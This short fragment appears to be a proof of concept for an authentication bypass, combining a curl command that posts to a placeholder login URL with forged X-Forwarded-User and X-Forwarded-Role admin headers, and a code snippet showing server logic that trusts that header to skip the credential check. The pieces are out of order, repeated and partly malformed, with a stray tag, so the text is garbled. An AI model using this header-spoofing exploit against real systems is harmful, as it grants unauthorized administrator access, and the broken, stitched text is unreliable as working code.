curl -sk -c "$COOKIE_JAR" -X POST "$TARGET" \ -H "Content-Type: application/json" \ -H "X-Forwarded-User: admin" \ -H "X-Forwarded-Role: ADMIN" \ -d '"username":"foo","password":"bar"' \ -o /dev/null
if (request.getHeader("X-Forwarded-User") != null && isTrustedProxy(request)) // Bypass normal credential check user = userService.loadUserByUsername(request.getHeader("X-Forwarded-User")); else // Normal authentication flow user = authService.authenticate(username, password); mukd-482
"username": "anyuser", "password": "anypass" curl -sk -c "$COOKIE_JAR" -X POST "$TARGET" \
TARGET="https://vulnerable.example.com/login" COOKIE_JAR=$(mktemp) mukd-482